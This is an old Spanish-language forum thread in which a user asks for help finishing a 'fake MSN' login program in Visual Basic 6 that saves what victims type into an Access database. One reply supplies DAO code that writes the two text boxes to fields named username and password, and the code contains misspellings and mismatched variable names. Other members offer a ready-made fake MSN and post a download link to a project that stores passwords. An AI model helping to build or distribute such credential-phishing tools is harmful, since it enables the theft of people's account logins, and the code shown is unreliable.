Base de datos en Visual basic

Iniciado por #Borracho.-, 14 Octubre 2005, 20:37 PM

0 Miembros y 1 Visitante están viendo este tema.

#Borracho.-

Bue che, resulta que estoy creando un MSN Falso en Visual Basic 6.0, y lo unico que me falta, es que los datos de 2 text box, se guarden automaticamente(al apretar enter) en una base de datos access llamada BaseMSN.

Desde ya...

Gracias
Si nos quedamos en este mundo, que no sea con hambre...

c0rrupt_gamer

Usa un data control con una base de Acces.
Mira en el curso basico de elguille, hay un par entrega donde te explica como hacerlo facilmente y de varias formas.

Numeros

Dim base as Database
Dim tabla as Recorset

Set base = OpenDatabase("C:\BaseMSN.mdb")

'Con una tabla de nombre tablaregistro

Set tabla = BaseMSN.OpenRecorset("tablaregistro")

'Compuesta por los campos username y password

tablaregistro.AddNew
  tablaregistro(0) = Text1
  tablaregistro(1) = Text2
tablaregistro.Update
'Se guarda la información

base.Close
'Se cierra para que no de errores

Nota: Debes agregar las referencias DAO previamente (Menu > Proyecto -> Referencias).

Salu2

yeikos

Cita de: JeRoS en 14 Octubre 2005, 20:37 PM
Bue che, resulta que estoy creando un MSN Falso en Visual Basic 6.0, y lo unico que me falta, es que los datos de 2 text box, se guarden automaticamente(al apretar enter) en una base de datos access llamada BaseMSN.

Desde ya...

Gracias

Yo tengo hecho el mio y es 100% real, si me lo pedis lo subo, pero no quiero que todos los lamers los tengan.

MaLkAvIaN_NeT

Bien aqui te dejo un enlaze para descargarte un msn falso:

http://www.elguruprogramador.com.ar/files/200513708529_MSN%20Messenger.zip

salu2

cin >>www.foroschl.tk
a por las buenas ideas

#Borracho.-

Bueno che gracias por responder, es que queria que alguien me ayude, porque yo intente con el control adodc y no me salio, me decia un error de conexion con la base de datos, lo que pasa es que yo no quiero uno para bajar yo queria hacer uno y me habia trabado en ese paso, pero gracias ==!!!
JeRoS

MaLkAvIaN_NeT

..Bien pero el enlaze que te dí es de un proyecto al cual puedes acceder a ver su código,, también trabaja con una BD de acces donde guarda los pass,,

salu2

cin >> www.foroschl.tk
a por las buenas ideas

#Borracho.-

A jaja es que no lo habia abierto yo, che bueno lo abri y lo baje, pero el codigo no lo puedo abrir desde VB, ya te agregue a mi MSN cualquier cosa si a vos te anda me lo mandas ok?????

Gracias

JeRoS